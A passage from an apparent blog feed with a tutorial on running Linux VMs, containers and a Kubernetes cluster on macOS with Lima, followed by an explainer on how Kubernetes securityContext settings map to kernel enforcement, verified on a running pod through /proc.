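  - location: "https://cloud-images.ubuntu.com/releases/noble/release/ubuntu-24.04-server-cloudimg-arm64.img"
    arch: "aarch64"
cpus: 4
memory: "4GiB"
disk: "100GiB"
mounts:
  - location: "~"        # home directory visible inside the VM
    writable: false      # read-only by default
</code></pre>
<p>If you run <code>limactl start</code> with no template at all, you get sensible defaults, which is exactly what we’ll do next.</p>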
<hr />
<h2 id="heading-quick-linux-sanity-check-run-a-simple-http-server">Quick Linux Sanity Check: Run a Simple HTTP Server</h2>
<p>Before doing anything more interesting, let’s get it running.</p>
<h3 id="heading-install-lima">Install Lima</h3>
<p>On your Mac it is simple to <a target="_blank" href="https://lima-vm.io/docs/installation/">install</a>.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % brew install lima
✔︎ JSON API cask.jws.json                                                                                                                  Downloaded   15.3MB/ 15.3MB
✔︎ JSON API formula.jws.json                                                                                                               Downloaded   32.0MB/ 32.0MB
==&gt; Fetching downloads <span class="hljs-keyword">for</span>: lima
✔︎ Bottle Manifest lima (2.0.3)                                                                                                            Downloaded   41.6KB/ 41.6KB
✔︎ Bottle lima (2.0.3)                                                                                                                     Downloaded   37.8MB/ 37.8MB
==&gt; Pouring lima--2.0.3.arm64_tahoe.bottle.1.tar.gz
...
==&gt; Summary
🍺  /opt/homebrew/Cellar/lima/2.0.3: 117 files, 77.6MB
</code></pre>
<h3 id="heading-start-a-vm-and-get-a-shell">Start a VM and Get a Shell</h3>
<p>Run a Lima VM.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % limactl start
? Creating an instance <span class="hljs-string">"default"</span> Proceed with the current configuration
...
INFO[0010] [hostagent] [VZ] - vm state change: running
INFO[0019] [hostagent] Started vsock forwarder: 127.0.0.1:63216 -&gt; vsock:22 on VM
INFO[0019] [hostagent] Detected SSH server is listening on the vsock port; changed 127.0.0.1:63216 to proxy <span class="hljs-keyword">for</span> the vsock port
INFO[0020] SSH Local Port: 63216
...
INFO[0042] [hostagent] Forwarding TCP from 127.0.0.1:36217 to 127.0.0.1:36217
INFO[0053] [hostagent] The final requirement 1 of 1 is satisfied
INFO[0053] READY. Run `lima` to open the shell.
</code></pre>
<p>Cool, let's see what we've got.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % limactl ls
NAME       STATUS     SSH                VMTYPE    ARCH       CPUS    MEMORY    DISK      DIR
default    Running    127.0.0.1:62655    vz        aarch64    4       4GiB      100GiB    ~/.lima/default
</code></pre>
<p>That’s nicely sized for Kubernetes out of the box.</p>
<p>Let's get a shell.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % lima
lima@lima-default:/Users/matt.brown$ <span class="hljs-built_in">cd</span>
lima@lima-default:~$
</code></pre>
<p>At this point, you’re inside the Linux VM. Not a container, just a VM.</p>
<h3 id="heading-verify-what-youre-running">Verify What You’re Running</h3>
<p>A couple of quick checks confirm we're in a real Linux instance. Lima runs Ubuntu out of the box, which suits us just fine.</p>
<pre><code class="lang-bash">lima@lima-default:~$ uname -a
cat /etc/os-release
Linux lima-default 6.17.0-8-generic <span class="hljs-comment">#8-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 20:54:15 UTC 2025 aarch64 GNU/Linux</span>
PRETTY_NAME=<span class="hljs-string">"Ubuntu 25.10"</span>
NAME=<span class="hljs-string">"Ubuntu"</span>
VERSION_ID=<span class="hljs-string">"25.10"</span>
VERSION=<span class="hljs-string">"25.10 (Questing Quokka)"</span>
VERSION_CODENAME=questing
ID=ubuntu
ID_LIKE=debian
HOME_URL=<span class="hljs-string">"https://www.ubuntu.com/"</span>
SUPPORT_URL=<span class="hljs-string">"https://help.ubuntu.com/"</span>
BUG_REPORT_URL=<span class="hljs-string">"https://bugs.launchpad.net/ubuntu/"</span>
PRIVACY_POLICY_URL=<span class="hljs-string">"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"</span>
UBUNTU_CODENAME=questing
LOGO=ubuntu-logo
</code></pre>
<h3 id="heading-start-a-simple-http-server">Start a Simple HTTP Server</h3>
<p>Ubuntu already has Python installed, so no setup required. Just create a directory with a simple HTML file.</p>
<pre><code class="lang-bash">lima@lima-default:~$ mkdir -p /tmp/web
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Hello from Lima"</span> &gt; /tmp/web/index.html
python3 -m http.server 8000 --directory /tmp/web
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
</code></pre>
<p>That’s a real process listening on a real Linux network interface inside the VM.</p>
<h3 id="heading-access-it-from-macos">Access It from macOS</h3>
<p>From your Mac, open a browser and hit:</p>
<pre><code class="lang-bash">http://localhost:8000
</code></pre>
<p>You should see the <em>Hello from Lima</em> page, served from inside the VM.</p>
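<p>If you’d rather check from the terminal than a browser, the same round trip is easy to script. Here’s a sketch you can run anywhere with Python 3 and <code>curl</code>; the port and directory are arbitrary choices, not anything Lima requires:</p>
<pre><code class="lang-bash"># Serve a file over HTTP and fetch it back, end to end.
mkdir -p /tmp/web-demo
echo "Hello from Lima" &gt; /tmp/web-demo/index.html
python3 -m http.server 8001 --directory /tmp/web-demo &amp;
SERVER_PID=$!
sleep 1
RESPONSE=$(curl -s http://localhost:8001/)
kill "$SERVER_PID"
echo "$RESPONSE"   # Hello from Lima
</code></pre>
<p>Inside the Lima VM, this is exactly what the browser test does, with Lima’s port forwarding standing in for <code>localhost</code>.</p>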
<h3 id="heading-what-just-happened">What Just Happened</h3>
<ul>
<li><p>The HTTP server is running inside the Linux VM</p>
</li>
<li><p>Lima forwarded the port to the host automatically</p>
</li>
<li><p>You didn’t install Docker or Kubernetes</p>
</li>
<li><p>You can see and control every layer involved</p>
</li>
</ul>
<p>And as an F1 great would say, <em>simply lovely</em>.</p>
<hr />
<h2 id="heading-a-single-container-just-to-prove-the-point">A Single Container (Just to Prove the Point)</h2>
<p>Before touching Kubernetes, it’s worth showing the smallest possible container example. This is still just Linux, running a container directly inside the VM.</p>
<p>The default Lima VM comes with <code>containerd</code> and <code>nerdctl</code>, so there’s nothing extra to install.</p>
<p>Use <code>lima</code> and <code>nerdctl</code> to fire up a container.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % lima nerdctl run -d --name nginx -p 8080:80 nginx:alpine
docker.io/library/nginx:alpine:                                                   resolved       |++++++++++++++++++++++++++++++++++++++|
index-sha256:b0f7830b6bfaa1258f45d94c240ab668ced1b3651c8a222aefe6683447c7bf55:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
manifest-sha256:969208a59fcbe5ed11f50a57fa6a0a023aa6311702f5fc252ac502a8a4d25c8a: <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
config-sha256:a6e56e8d6213d3aa3046e4a1cb49d6ed133a1afc9178d8c17cbec445e330537a:   <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:8a735f2296d46b598dbc65289bfdc2ec4dd07607e69a1887e4ce6ef898be56e1:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:c0de4eea5b769c1703c4428a21cf0cce5b0a1668738391f1443979bb32cc9bc1:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:6628835d87d286d4d03f10b2c7f51d00f4556c49b5874947ce02609379069575:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:ceb87b8ac279a84fc99bdc30e7406cf21bf5d5841819fd0e3c8e0c06d867533c:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:f6b4fb9446345fcad2db26eac181fef6c0a919c8a4fcccd3bea5deb7f6dff67e:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:f4f04eae8d5eb8a0220a0d542da10f9c55b57a585dea1875cfbb1ee99d4c5a4a:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:a0ef6d8231d0e512c7a0c0f7029bcfb8c77f0848b9cb8ec5373b28991c83415b:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:9076aaa4fd77085ce5562e9aca2b51ca88baf3fb8e41f8c777d0df14a1ce1085:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
elapsed: 4.2 s                                                                    total:  24.6 M (5.8 MiB/s)
d3d4038f5cb71c934703f165b636b5a66d9fa61892ee79f1fc37097d7a4ea4ff
</code></pre>
<p>From your Mac, open a browser and hit:</p>
<pre><code class="lang-bash">http://localhost:8080
</code></pre>
<p>That’s it.</p>
<ul>
<li><p>The container is running inside the Linux VM</p>
</li>
<li><p>The port is forwarded back to macOS</p>
</li>
<li><p>No Docker involved!</p>
</li>
</ul>
<p>At this point, we have Linux and a container runtime with full visibility into what’s actually running.</p>
<hr />
<h2 id="heading-kubernetes-with-lima">Kubernetes with Lima</h2>
<p>Lima also has a Kubernetes mode. This is real Kubernetes, but it’s optimized for speed and convenience. It’s less useful for teaching cluster operations or mimicking production environments.</p>
<p>Start a Kubernetes-enabled Lima instance with default settings.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % limactl start --name lima-k8s template://k8s
WARN[0000] Template locator <span class="hljs-string">"template://k8s"</span> should be written <span class="hljs-string">"template:k8s"</span> since Lima v2.0
? Creating an instance <span class="hljs-string">"lima-k8s"</span> Proceed with the current configuration
...
Downloading the image (ubuntu-24.04-server-cloudimg-arm64.img)
592.12 MiB / 592.12 MiB [----------------------------------] 100.00% 19.40 MiB/s
INFO[0036] Downloaded the image from <span class="hljs-string">"https://cloud-images.ubuntu.com/releases/noble/release-20251213/ubuntu-24.04-server-cloudimg-arm64.img"</span>
INFO[0039] Attempting to download the nerdctl archive    arch=aarch64 digest=<span class="hljs-string">"sha256:2c4b97312acd41c4dfe80db6e82592367b3862b5db4c51ce67a6d79bf6ee00ee"</span> location=<span class="hljs-string">"https://github.com/containerd/nerdctl/releases/download/v2.2.1/nerdctl-full-2.2.1-linux-arm64.tar.gz"</span>
...
INFO[0292] Message from the instance <span class="hljs-string">"lima-k8s"</span>:
To run `kubectl` on the host (assumes kubectl is installed), run the following commands:
------
<span class="hljs-built_in">export</span> KUBECONFIG=<span class="hljs-string">"/Users/matt.brown/.lima/lima-k8s/copied-from-guest/kubeconfig.yaml"</span>
kubectl ...
------
</code></pre>
<p>So let's run <code>kubectl</code> from our local machine after exporting the kubeconfig.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % <span class="hljs-built_in">export</span> KUBECONFIG=<span class="hljs-string">"/Users/matt.brown/.lima/lima-k8s/copied-from-guest/kubeconfig.yaml"</span>
matt.brown@matt ~ % kubectl get po
No resources found <span class="hljs-keyword">in</span> default namespace.
</code></pre>
<p>Cool, it's up and running.</p>
<p>Deploy something trivial and expose it.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % kubectl create deployment hello --image=nginx
deployment.apps/hello created
matt.brown@matt ~ % kubectl get po
NAME                     READY   STATUS    RESTARTS   AGE
hello-775d79c56b-jrnk5   1/1     Running   0          8s
matt.brown@matt ~ % kubectl expose deployment hello --<span class="hljs-built_in">type</span>=NodePort --port=80
service/hello exposed
</code></pre>
<p>Then let's grab the <code>NodePort</code>.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % kubectl get svc
NAME         TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)        AGE
hello        NodePort    10.97.172.133   &lt;none&gt;        80:31866/TCP   3s
kubernetes   ClusterIP   10.96.0.1       &lt;none&gt;        443/TCP        7m
</code></pre>
<p>From your Mac, open a browser and hit:</p>
<pre><code class="lang-bash">http://localhost:31866 <span class="hljs-comment">#or your NodePort</span>
</code></pre>
<p>That’s enough to prove the point. You have a working Kubernetes API, a running workload, and a cluster you didn’t have to assemble by hand.</p>
<p>This setup is well-suited for:</p>
<ul>
<li><p>API exploration</p>
</li>
<li><p>RBAC experiments</p>
</li>
<li><p>Admission and policy testing</p>
</li>
</ul>
<p>It’s not a replacement for a production-shaped cluster, but we know that.</p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>In a single tool, we went from a clean Linux VM to a running process, a container, and a Kubernetes deployment. There was nothing complicated and thankfully no Minikube.</p>
<p>That’s the point of Lima. There’s a lot more you can do here: custom images, multi-VM setups, deeper Kubernetes tuning. I might visit that in the future.</p>
<p>But for learning, testing, and fast iteration, this is where I wanted to land.</p>
]]></content:encoded></item><item><title><![CDATA[Kubernetes securityContext]]></title><description><![CDATA[Kubernetes has a talent I don’t: making hard problems feel solved the moment you put them in YAML.
securityContext is the best example.
Most people talk about it like it’s a “Kubernetes security feature.” It’s not. Kubernetes doesn’t enforce the thin...]]></description><link>https://cloudsecburrito.com/kubernetes-securitycontext</link><guid isPermaLink="true">https://cloudsecburrito.com/kubernetes-securitycontext</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[security Context]]></category><category><![CDATA[Linux]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Thu, 22 Jan 2026 04:09:51 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1769053208941/576d5517-5d81-4cc4-b5a9-d9ad4c2fba20.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kubernetes has a talent I don’t: making hard problems feel solved the moment you put them in YAML.</p>
<p><code>securityContext</code> is the best example.</p>
<p>Most people talk about it like it’s a “Kubernetes security feature.” It’s not. Kubernetes doesn’t enforce the things you set here. It <strong>passes intent</strong> to the container runtime, which then asks the Linux kernel to apply controls like:</p>
<ul>
<li><p>syscall filtering (seccomp)</p>
</li>
<li><p>privilege scoping (capabilities)</p>
</li>
<li><p>mandatory access rules (LSMs like AppArmor)</p>
</li>
<li><p>identity defaults (UID/GID and group settings)</p>
</li>
</ul>
<p>That’s a contractual boundary, not a guarantee of outcome.</p>
<p>This post exists because we tend to do one of two things:</p>
<ul>
<li><p>ignore <code>securityContext</code> entirely, then act surprised when a pod behaves exactly like a pod</p>
</li>
<li><p>sprinkle a few fields into YAML and declare it “hardened”</p>
</li>
</ul>
<p>We’ll walk through what <code>securityContext</code> actually represents, why pod-level versus container-level scope matters, and where Kubernetes stops caring. This isn’t a copy-paste guide; it’s the mental model.</p>
<p>Along the way, we’ll anchor the discussion to topics already covered, including our old friends like Linux capabilities. These serve as reference points rather than detours.</p>
<hr />
<h2 id="heading-orientation-diagram-the-securitycontext-contract">Orientation Diagram: The <code>securityContext</code> Contract</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769053286698/1d4c7669-90c3-4996-b517-6e277ba9ba72.png" alt class="image--center mx-auto" /></p>
<p>Keep this diagram in mind. Everything in this post maps back to where enforcement actually happens: the kernel.</p>
<hr />
<h2 id="heading-what-securitycontext-is-and-is-not">What <code>securityContext</code> Is (and Is Not)</h2>
<p>At its core, <code>securityContext</code> is an interface, not a security engine. Kubernetes does not implement seccomp. It does not enforce Linux capabilities. It does not mediate LSM decisions. What it does is collect intent from the workload spec and hand that intent to the container runtime at process start. From that point on, Kubernetes is out of the loop.</p>
<p>That distinction matters because it defines the limits of what Kubernetes can guarantee:</p>
<ul>
<li><p>Kubernetes can validate that your YAML is well-formed</p>
</li>
<li><p>Kubernetes can ensure the runtime receives your intent</p>
</li>
<li><p>Kubernetes cannot confirm that the kernel actually enforced it</p>
</li>
</ul>
<p>If a seccomp profile is missing, an AppArmor profile is not loaded, or a kernel feature is disabled, Kubernetes does not block the pod from starting. As far as the API server is concerned, its job is done. This is not a bug. Kubernetes is a scheduler and orchestration system. Host security enforcement happens elsewhere. <code>securityContext</code> is the handshake between those worlds.</p>
<hr />
<h2 id="heading-pod-level-vs-container-level-securitycontext">Pod-Level vs Container-Level <code>securityContext</code></h2>
<p>One of the easiest ways to misunderstand <code>securityContext</code> is to miss <strong>where</strong> it applies. Kubernetes allows <code>securityContext</code> to be defined at both the <strong>pod level</strong> and the <strong>container level</strong>, and those scopes behave very differently.</p>
<h3 id="heading-pod-level-securitycontext">Pod-Level <code>securityContext</code></h3>
<p>A pod-level <code>securityContext</code> defines <strong>defaults</strong> for every container in the pod.</p>
<p>This is where you can see:</p>
<ul>
<li><p>default user and group IDs</p>
</li>
<li><p>filesystem group ownership</p>
</li>
<li><p>a default seccomp profile</p>
</li>
</ul>
<p>These settings establish a baseline posture for the pod as a whole. If nothing else is specified, every container inherits them.</p>
<p>At this point you could say the pod is secure, but that assumption only holds if nothing overrides it.</p>
<h3 id="heading-container-level-securitycontext">Container-Level <code>securityContext</code></h3>
<p>Container-level <code>securityContext</code> applies to <strong>individual processes</strong>.</p>
<p>This is where you control:</p>
<ul>
<li><p>Linux capabilities</p>
</li>
<li><p>privilege escalation behavior</p>
</li>
<li><p>privileged mode</p>
</li>
<li><p>container-specific user overrides</p>
</li>
</ul>
<p>Container-level settings are authoritative. They can narrow the pod’s posture, but also weaken it. A pod can declare a reasonable default at the top level while a single container opts out of meaningful restrictions. Kubernetes allows this because pods are composition units, not trust boundaries.</p>
<p>The practical takeaway is simple:</p>
<blockquote>
<p>Pod-level <code>securityContext</code> expresses intent.<br />Container-level <code>securityContext</code> determines behavior.</p>
</blockquote>
<h3 id="heading-where-this-becomes-relevant">Where This Becomes Relevant</h3>
<p>This pod-versus-container split is why:</p>
<ul>
<li><p>admission policies might validate both scopes</p>
</li>
<li><p>scanners flag container-level exceptions even when pod defaults look fine</p>
</li>
<li><p>runtime tools frequently surface behavior that “shouldn’t have been allowed”</p>
</li>
</ul>
<hr />
<h2 id="heading-mapping-securitycontext-to-kernel-enforcement-what-actually-happens">Mapping <code>securityContext</code> to Kernel Enforcement (What Actually Happens)</h2>
<p>Before looking at behavior and failure modes, it helps to be explicit about <strong>what knobs actually exist</strong> and <strong>where they land</strong>.</p>
<p>Kubernetes exposes a relatively small <code>securityContext</code> surface area. Each field maps to a specific kernel mechanism.</p>
<blockquote>
<p>I suggest reading the API docs to supplement. <a target="_blank" href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.35/#podsecuritycontext-v1-core">Pod Security Context</a> and <a target="_blank" href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.35/#securitycontext-v1-core">Container Security Context</a>.</p>
</blockquote>
<h3 id="heading-securitycontext-fields-and-kernel-mapping"><code>securityContext</code> Fields and Kernel Mapping</h3>
<div class="hn-table">
<table>
<thead>
<tr>
<td>securityContext Field</td><td>Scope</td><td>Kernel Mechanism</td><td>What the Kernel Enforces</td></tr>
</thead>
<tbody>
<tr>
<td><code>allowPrivilegeEscalation</code></td><td>Container</td><td>no_new_privs</td><td>Whether exec can gain new privileges</td></tr>
<tr>
<td><code>appArmorProfile</code></td><td>Pod / Container</td><td>LSM</td><td>Resource access decisions</td></tr>
<tr>
<td><code>capabilities.add</code> / <code>capabilities.drop</code></td><td>Container</td><td>Linux capabilities</td><td>Which privileged operations may succeed</td></tr>
<tr>
<td><code>fsGroup</code></td><td>Pod</td><td>GID (filesystem)</td><td>File ownership and write permissions</td></tr>
<tr>
<td><code>fsGroupChangePolicy</code></td><td>Pod</td><td>Filesystem ownership change</td><td>Controls when volume ownership and permissions are modified before mount</td></tr>
<tr>
<td><code>privileged</code></td><td>Container</td><td>Multiple</td><td>Disables several isolation controls</td></tr>
<tr>
<td><code>procMount</code></td><td>Container</td><td>procfs mount masking</td><td>Which <code>/proc</code> paths are masked or read-only</td></tr>
<tr>
<td><code>readOnlyRootFilesystem</code></td><td>Container</td><td>VFS permissions</td><td>Filesystem write restrictions</td></tr>
<tr>
<td><code>runAsGroup</code></td><td>Pod / Container</td><td>GID</td><td>Process primary group</td></tr>
<tr>
<td><code>runAsNonRoot</code></td><td>Pod / Container</td><td>UID Check</td><td>Prevents process from running as UID 0</td></tr>
<tr>
<td><code>runAsUser</code></td><td>Pod / Container</td><td>UID</td><td>Process user identity</td></tr>
<tr>
<td><code>seLinuxChangePolicy</code></td><td>Pod</td><td>SELinux labeling (filesystem)</td><td>Controls how SELinux labels are applied to pod volumes</td></tr>
<tr>
<td><code>seLinuxOptions</code></td><td>Pod / Container</td><td>LSM</td><td>Resource access decisions</td></tr>
<tr>
<td><code>seccompProfile</code></td><td>Pod / Container</td><td>seccomp (BPF)</td><td>Which syscalls may execute</td></tr>
<tr>
<td><code>supplementalGroups</code></td><td>Pod</td><td>Groups</td><td>Additional group access</td></tr>
<tr>
<td><code>supplementalGroupsPolicy</code></td><td>Pod</td><td>Group resolution (UID/GID)</td><td>Controls how supplemental groups are calculated for container processes</td></tr>
<tr>
<td><code>sysctls</code></td><td>Pod</td><td>Kernel sysctl (namespaced)</td><td>Sets kernel parameters for the pod</td></tr>
<tr>
<td><code>windowsOptions</code></td><td>Pod / Container</td><td>Various</td><td>Additional options via Windows <code>SecurityContext</code></td></tr>
</tbody>
</table>
</div><h3 id="heading-what-this-looks-like-at-runtime">What This Looks Like at Runtime</h3>
<p>To make this concrete, consider a container with a <code>securityContext</code> that:</p>
<ul>
<li><p>runs as a non-root user</p>
</li>
<li><p>drops most Linux capabilities</p>
</li>
<li><p>disables privilege escalation</p>
</li>
<li><p>uses the default seccomp profile</p>
</li>
</ul>
<p>This is the kind of configuration many teams consider a reasonable baseline.</p>
<p>When the container starts, the runtime translates this configuration into kernel state before any application code runs.</p>
<p>First, the kernel assigns the process its UID, GID, and group set. At that point, the process is no longer “a container.” It is just a Linux process with an identity. If the application expected to run as root, that assumption is already broken.</p>
<p>Next, the kernel applies the capability set. Any operation that relies on a dropped capability fails at the kernel permission check, not in Kubernetes.</p>
<p>With privilege escalation disabled, the kernel also prevents the process from gaining additional privileges across exec boundaries. Even if a binary is misconfigured or marked setuid, the process cannot elevate itself later.</p>
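<p>This flag is easy to see in isolation. A minimal sketch on a Linux host, assuming <code>setpriv</code> from util-linux is available (nothing Kubernetes-specific here):</p>
<pre><code class="lang-bash"># Run a child with no_new_privs set, then read the flag back from /proc.
FLAG=$(setpriv --no-new-privs sh -c 'grep NoNewPrivs /proc/self/status')
echo "$FLAG"   # NoNewPrivs: 1
</code></pre>
<p>The runtime does the same thing on the container’s behalf when <code>allowPrivilegeEscalation: false</code> is set.</p>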
<p>Then the seccomp filter is loaded. Seccomp does not wait for suspicious behavior. It defines which syscalls are allowed to execute at all. If the process attempts a disallowed syscall, the kernel intervenes immediately.</p>
<p>By the time the application starts executing logic, the kernel has already decided:</p>
<ul>
<li><p>the process runs as a non-root user</p>
</li>
<li><p>most privileged operations will fail due to dropped capabilities</p>
</li>
<li><p>the process cannot gain additional privileges through execution</p>
</li>
<li><p>only the syscalls allowed by the default seccomp profile may execute</p>
</li>
</ul>
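<p>All four of those decisions are ordinary kernel state, visible in <code>/proc</code> for any process. You can preview the same fields for your own shell on any Linux host, no Kubernetes required:</p>
<pre><code class="lang-bash"># Identity, capabilities, no_new_privs, and seccomp mode, straight from the kernel.
STATUS=$(grep -E '^(Uid|Gid|CapEff|NoNewPrivs|Seccomp):' /proc/self/status)
echo "$STATUS"
</code></pre>
<p>These are the same fields we’ll read for the container process on a real node below.</p>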
<p>From Kubernetes’ point of view, the pod is simply running.  From the kernel’s point of view, the rules are already fixed.</p>
<p>This is why <code>securityContext</code> matters, and also why it is so easy to misunderstand.</p>
<hr />
<h2 id="heading-proving-the-contract-lets-actually-run-this">Proving the Contract: Let’s Actually Run This</h2>
<p>Up to this point, we’ve talked about intent, enforcement, and kernel behavior in the abstract. Now let’s stop theorizing and actually run something. The goal here isn’t to harden a production workload or enumerate every syscall. It’s to take a <strong>simple, representative</strong> <code>securityContext</code>, deploy it, and then observe what the kernel enforces in practice.</p>
<p>Here’s the pod.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">securitycontext-proof</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">securityContext:</span>
    <span class="hljs-attr">runAsNonRoot:</span> <span class="hljs-literal">true</span>
    <span class="hljs-attr">seccompProfile:</span>
      <span class="hljs-attr">type:</span> <span class="hljs-string">RuntimeDefault</span>
  <span class="hljs-attr">containers:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">demo</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">nginxinc/nginx-unprivileged</span>
    <span class="hljs-attr">command:</span> [<span class="hljs-string">"sh"</span>, <span class="hljs-string">"-c"</span>, <span class="hljs-string">"sleep 3600"</span>]
    <span class="hljs-attr">securityContext:</span>
      <span class="hljs-attr">allowPrivilegeEscalation:</span> <span class="hljs-literal">false</span>
      <span class="hljs-attr">capabilities:</span>
        <span class="hljs-attr">drop:</span>
          <span class="hljs-bullet">-</span> <span class="hljs-string">ALL</span>
</code></pre>
<p>This is intentionally boring.</p>
<p>In the sections that follow, we’ll look at what’s actually running on the node and how each part of this configuration shows up as a concrete, enforceable decision by the kernel.</p>
<h3 id="heading-what-this-looks-like-on-a-real-node">What This Looks Like on a Real Node</h3>
<p>At this point, nothing here is abstract anymore. The configuration has been applied, the process is running, and the kernel has already made its decisions. Now let’s look at what’s actually running on the node.</p>
<h4 id="heading-resolve-the-container-pid-on-the-host">Resolve the Container PID on the Host</h4>
<p>These commands bridge Kubernetes to the host kernel.</p>
<pre><code class="lang-bash">matt@cp:~/sec-context$ CID=$(kubectl get pod securitycontext-proof -o jsonpath=<span class="hljs-string">'{.status.containerStatuses[0].containerID}'</span> | sed <span class="hljs-string">'s|containerd://||'</span>)
PID=$(sudo crictl inspect <span class="hljs-variable">$CID</span> | jq -r .info.pid)
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Container PID on host: <span class="hljs-variable">$PID</span>"</span>
WARN[0000] Config <span class="hljs-string">"/etc/crictl.yaml"</span> does not exist, trying next: <span class="hljs-string">"/usr/bin/crictl.yaml"</span>
WARN[0000] runtime connect using default endpoints: [unix:///run/containerd/containerd.sock unix:///run/crio/crio.sock unix:///var/run/cri-dockerd.sock]. As the default settings are now deprecated, you should <span class="hljs-built_in">set</span> the endpoint instead.
WARN[0000] Image connect using default endpoints: [unix:///run/containerd/containerd.sock unix:///run/crio/crio.sock unix:///var/run/cri-dockerd.sock]. As the default settings are now deprecated, you should <span class="hljs-built_in">set</span> the endpoint instead.
Container PID on host: 77587
</code></pre>
<h4 id="heading-process-identity">Process Identity</h4>
<p>Validate that the process is running as a non-root user.</p>
<pre><code class="lang-bash">matt@cp:~/sec-context$ ps -o pid,uid,gid,cmd -p <span class="hljs-string">"<span class="hljs-variable">$PID</span>"</span>
    PID   UID   GID CMD
  77587   101   101 sh -c sleep 3600
</code></pre>
<p>Expected:</p>
<ul>
<li><p>UID != 0</p>
</li>
<li><p>GID != 0</p>
</li>
<li><p>Command matches the container entrypoint</p>
</li>
</ul>
<h4 id="heading-capabilities">Capabilities</h4>
<p>Inspect the effective capability set applied by the kernel.</p>
<pre><code class="lang-bash">matt@cp:~/sec-context$ sudo grep Cap /proc/<span class="hljs-variable">$PID</span>/status
CapInh:    0000000000000000
CapPrm:    0000000000000000
CapEff:    0000000000000000
CapBnd:    0000000000000000
CapAmb:    0000000000000000
</code></pre>
<p>Key field:</p>
<ul>
<li><code>CapEff</code> should be all zeros, indicating no effective capabilities.</li>
</ul>
<p>Optional decode for readability:</p>
<pre><code class="lang-bash">matt@cp:~/sec-context$ sudo capsh --decode=$(awk <span class="hljs-string">'/CapEff/ {print $2}'</span> /proc/<span class="hljs-variable">$PID</span>/status)
0x0000000000000000=
</code></pre>
<h4 id="heading-privilege-escalation-nonewprivs">Privilege Escalation (<code>no_new_privs</code>)</h4>
<p>Confirm that privilege escalation is disabled at the kernel level.</p>
<pre><code class="lang-bash">matt@cp:~/sec-context$ grep NoNewPrivs /proc/<span class="hljs-variable">$PID</span>/status
NoNewPrivs:    1
</code></pre>
<h4 id="heading-seccomp">Seccomp</h4>
<p>Check that a seccomp filter is active.</p>
<pre><code class="lang-bash">matt@cp:~/sec-context$ grep Seccomp /proc/<span class="hljs-variable">$PID</span>/status
Seccomp:    2
Seccomp_filters:    1
</code></pre>
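<p>The numeric value maps to the kernel’s seccomp modes: <code>0</code> is disabled, <code>1</code> is strict mode, and <code>2</code> means a BPF filter is installed. A tiny helper makes the field self-explanatory (a sketch; <code>seccomp_mode</code> is a hypothetical function name, the mode values themselves come from the kernel):</p>
<pre><code class="lang-bash"># Decode the numeric Seccomp field from /proc/&lt;pid&gt;/status.
seccomp_mode() {
  case "$1" in
    0) echo "disabled" ;;
    1) echo "strict" ;;
    2) echo "filter (BPF)" ;;
    *) echo "unknown" ;;
  esac
}

seccomp_mode 2   # prints: filter (BPF)
</code></pre>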
<h3 id="heading-putting-it-together">Putting it Together</h3>
<p>Taken together, these checks show that the running process:</p>
<ul>
<li><p>has a non-root UID and GID</p>
</li>
<li><p>has no effective Linux capabilities</p>
</li>
<li><p>cannot gain privileges after startup</p>
</li>
<li><p>is constrained by a seccomp syscall filter</p>
</li>
</ul>
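<p>If you want all of that in one pass, the checks above collapse into a single read of <code>/proc</code> (a sketch; it assumes <code>PID</code> was resolved earlier, and falls back to the current shell so you can dry-run it anywhere):</p>
<pre><code class="lang-bash"># One-shot summary of the kernel-enforced contract for a process.
PID="${PID:-$$}"   # fall back to this shell for a dry run
awk '/^(Uid|Gid|CapEff|NoNewPrivs|Seccomp):/ { print $1, $2 }' "/proc/$PID/status"
</code></pre>
<p>For the pod above you would expect <code>Uid: 101</code>, <code>CapEff: 0000000000000000</code>, <code>NoNewPrivs: 1</code>, and <code>Seccomp: 2</code>.</p>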
